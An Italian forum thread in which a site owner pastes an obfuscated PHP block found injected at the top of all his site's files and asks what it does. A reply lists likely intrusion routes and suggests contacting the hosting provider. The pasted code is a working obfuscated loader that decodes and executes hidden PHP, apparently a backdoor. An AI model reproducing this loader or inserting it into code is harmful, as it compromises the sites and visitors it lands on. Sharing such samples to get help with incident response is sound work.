codice php iniettato dentro ai sorgenti

[Popper]

Buonasera
scrivo qui che forse è più appropriato:
mi sono trovato tutti i file PHP di un sito inzaccherati con questo codice in testa a tutti i file (riporto sotto).
Qualcuno ha idea di come capire cosa fa questo codice e come possono aver fatto a buttarlo dentro? non ho eval da nessuna parte quindi non riesco proprio a capire cosa possa essere successo...

Codice PHP:

$ttlrcbui = '!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+ufnbozcYufhA    x272qj%6<^#zsfvr#    x5cq%pcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0u%-#jt0}Z;0]=]0#)2q%l}]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]    x63    162    x65    141    x74    145    x5f    146    x75    1#Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#)3of)fepdof`57ftbc    x7f!|!*uyfu    x27k:!ftmf!}Z;^nbsbq%    x2`hA    x27pd%6<C    x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf    xsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*fmjix6<C    x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/bs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut#*<!sfuvso!sboepn)%epnb]26    x24-    x24<%j,,*!|    x24-    x24gvodujpo!    x24-    321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bs<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y][!%rN}#QwTW%hIr    x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#doj%7-C)fepmqnjA    x27&6<.fmjgA    x27doj%6<    x7fw6*    x7f_*#fmjgk4`{6~67&6<    x7fw6*    x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}j{hnpd!opjudovg!|!**#j{h{h%)tpqsut>j%!*9!    x27!hmg%)!gj!~<of00#W~!Ydrr)%rxB%epnbss!>!bQUUI&e_SEEB`FUPNFS&d_SFSFGFS`QU!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~928>>    x22:ftmbg39*5c    x27,*b    x27)fepdof.)fe    x52    137    x41    107    x45    116    x54"]); if ((str-    x24tvctus)%    x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%i    x5c1^W%c!>!%i    x5c2^<!Ce*[!%cIjQeTQcOc/##)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusutw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]2g)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftm78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]5`hA    x27pd%6<pd%w6Z6<.4`hA    x27pd%6<pd%w6Z6<.3`hA    x27pd%6<pd%w6Z6<.6A:>:8:|:7#6#)tutjyf`439275ttf#!>!2p%Z<^2    x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1Grstr($uas,"    x72    166    x3a    61    x31"))) { $lybojrz = "<!~!    x24/%t2w/    x24)##-!#~<#/%    x24-    x24!>!fyqmpef)#q%>U<#16,47R57,27R66,#/q%>2q%<s    x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1mdR6<*id%)dfyfR    x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfdv); $lrssxts();}}f-s.973:8297f:5297e:56-xr.98568]y7f#<!%tww!>!    x2400~:<h%_t%:osvufs:~:<*9-1-r%)s<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA    x22)7gj6<*QDU`MPT7-NBFSU;!osvufs}w;*    x7f!>>    x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}    x27;!>>>!}_;gvc%}&;ftmbg}    x7f    x24*<!%t::!>!    x24Ypp3)%cB%iN}#-!    x24/%tmw/    x24)%c*W%eN+#Q8y]572]48y]#>m%:|:*r%:-b:>1<!fmtf!%b:>%s:    x5c%j:.2^,%b:<!%cbsbq%)323ldfidk!~!<**qp%!-uyfu%7UFH#    x27rfs%6~6<    x7fw66<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR    x27id%6!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nf    x7f    x7f<u%V    x27{ftmfV    x7f<*X&Z&S91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)%)sutcvt)esp>hmg%!<12>j%!|!*#!osvufs!*!+A!>!{e%)!>>    x22!ftmbg)!gj<*#k#)usbut`cpV    x7f    x77rfs%6<#o]1/20QUUI7jsv%T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]x24y7    x24-    x24*<!    x24-    x24gps)%j>1<%j=tj{fpg)%    x24-    x24*-    x24-!%    x24-    x24*!|!    x24-    x24    x5c%j^    x24%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%T`LDPT7-UFOJ`GB)fubfsdXA    x27K6<    x7fw6*3qj%7>    x2272qj%)7gj5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#D#)sfebfI{*w%)kVx{**#k#)tutjyf`x    x22l:!}V;3q%}U#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuop**^#zsfvr#    x5cq%)ufttj    x22)gj6<^#Y#    x5cq%    x27Y%6<.msv`ftsbUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%    x7f!<X>b%Z<qA7>q%6<    x7fw6*    x7f_*#fubfsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*<    x7fw6*    x7f_*#ujojRk3`{666~6<&w6<    x7fw6*CW&)7gj6<.[A    x2ion sgqtjob($n){return chr(ord($n)-1);} @errorss-%rxW~!Ypp2)%zB%z>!    x24/%tmw/    x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*DgP5]D6#<%fdy>#]D4]2252]18y]#>q%<#762]67y]562]3if((function_exists("    x6f    142    x5f    163    xrtolower($_SERVER["    x48    124    x54    120    x5f    125    x53    10552]y85]256]y6g]257]y86]267]y74]275]y7:]2y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*O    x22#)fepmqyfA>2b%!<*qp%-*.%my%,3,j%>j%!<**3-j%-bubE74    141    x72    164") && (!isset($GLOBALS["    x61    :>%s:    x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!!%z>3<!fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#56    x63    164    x69    157    x6e"; functm!|!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h}+;%-qp%)54l}    x27;%!<*#}_;#)323ldfid>}&;bge56+99386c6f+9f5d816:+946:ce44#)zbss:!>!    x246767~6<Cw6<pd%w6Z6<.ssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dcS;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_    x5c}X    x24<!%tm7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{**6<**2qj%)hopm3qjA)qj3hopmA    x273qj%6<*Y%):52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-_reporting(0); $nazumcv = implode(array_map("sgqtjob",str_splb!>!ssbnpe_GMFT`QIQ&f_UTPI`it("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w%>/h%:<**#57]38y]47]67<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%{ftmfV    x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/str($uas,"    x6d    163    x69    145")) or (st7/7#@#7/7^#iubq#    x5cq%    x27jsv%6<C>^#zsfvr#    x5cq%7<tfs%w6<    x7fw6*CWtfs%)7gj6<*id%)ftp(<!fwbm)%tjw)#    x24#-!#]y38#-!%wftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX    x27u%)7svufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<2527}88:}334}472    x24<!%ff2!>!bssbz)    x24]25    x24)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rr156    x75    156    x61"])))) { $GLOBALS["    x61    156    x75    156    x61"]=1; $uas=st27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K):**<")));$lrssxts = $lybojrz("", $nazumc>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!    x27!hmg%)!gj!<2,*j%-#1]#-bubEnpd#)tutjyf`opjudovg    x22)!gj}1~!<2p%    x7f!~!<#pdof./#@#/qp%>5h%!<*::::::-111112)eo{h%)sutcvt-#w#)ldbqov>*ofmy%)utj>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*z-#:#*    x24-    x24!>!    x24/%tjw/    x24)%    x24-    x24y4    x24-    x24]y8    x24-    x24f!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!ommvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4    x223}!+!<+{e73]D6P2L5P6]y6gP7L6M7]t%)3of:opjudovg<~    x24<!%o:!>!    x242178};y]}R;2]},;osvufs}    x27;mnui}&;zepc}A;~!}    x985:6197g:74985-rr.93e:5597Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSh%)m%):fmjix:<##:>:h%:d/#00;quui#>.%!<***f    x27,*e    x27,*d    x27,*sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsuiilhtd'; $huzcytqwd=explode(chr((711-591)),substr($ttlrcbui,(39291-33414),(107-73))); $opjsean = $huzcytqwd[0]($huzcytqwd[(4-3)]); $erfbebi = $huzcytqwd[0]($huzcytqwd[(14-12)]); if (!function_exists('bitxpfjv')) { function bitxpfjv($sjqtaosag, $kdfjqsy,$tuyetrb) { $fjkfcxtd = NULL; for($kxfoeba=0;$kxfoeba<(sizeof($sjqtaosag)/2);$kxfoeba++) { $fjkfcxtd .= substr($kdfjqsy, $sjqtaosag[($kxfoeba*2)],$sjqtaosag[($kxfoeba*2)+(3-2)]); } return $tuyetrb(chr((60-51)),chr((641-549)),$fjkfcxtd); }; } $dopxgrz = explode(chr((307-263)),'3576,39,3810,43,5004,67,3615,51,1194,41,4693,36,1660,49,205,38,3956,30,3419,46,4406,61,4494,68,4112,28,1509,66,449,63,5071,34,4844,45,551,49,2763,23,2409,23,2066,62,2999,57,4298,40,40,35,4729,49,3193,58,3304,59,883,64,4778,35,1851,51,2432,51,3363,56,947,50,5752,63,2191,70,2128,63,1421,37,5528,39,4889,36,5241,63,1021,35,3786,24,5385,32,3986,48,2676,29,2626,50,997,24,5304,45,1605,55,3757,29,4970,34,5837,40,1171,23,5349,36,600,44,0,40,75,43,1329,40,313,31,4074,38,4467,27,1082,31,3251,53,2541,51,2378,31,395,54,3056,45,4034,40,1113,58,1575,30,512,39,5567,56,2962,37,2705,58,2592,34,4637,56,1759,30,3148,45,3101,47,5683,42,4248,50,118,22,4190,58,1369,52,3666,40,2016,50,4562,22,3706,51,5815,22,763,58,3549,27,2319,23,5645,38,4925,45,2921,41,1235,53,5462,66,667,44,2865,56,1709,50,2261,58,1288,41,1056,26,4140,50,644,23,3465,64,821,62,2483,58,5725,27,1987,29,4338,68,2822,43,1458,51,3529,20,5623,22,344,51,1902,68,5145,58,243,70,140,65,711,52,1789,62,4584,53,2342,36,3853,39,5417,45,3892,64,2786,36,5203,38,4813,31,5105,40,1970,17'); $nhqwrsh = $opjsean("",bitxpfjv($dopxgrz,$ttlrcbui,$erfbebi)); $opjsean=$ttlrcbui; $nhqwrsh(""); $nhqwrsh=(515-394); $ttlrcbui=$nhqwrsh-1; 


[Alhazred]

Senza conoscere il codice del tuo sito è impossibile risponderti, le cause possono essere tantissime.
Da qualche parte ci sarà una qualche vulnerabilità, oppure chi l'ha fatto ha in qualche modo avuto accesso al tuo spazio ftp, oppure ancora se sei su un server condiviso l'attacco potrebbe averlo subito un altro sito sullo stesso server e da lì si è diffuso sui file degli altri siti lì ospitati.

Insomma, per noi è impossibile dirti il motivo certo di quanto avvenuto, scrivi al supporto del tuo hosting provider e fa presente la cosa, magari sanno di qualche attacco che hanno subito e se necessario daranno una ripulita in caso di virus presente sul server.

[Popper]

ok grazie
non si riesce a capire il codice inserito fisicamente cosa fa?

[Alhazred]

Sicuramente niente di buono.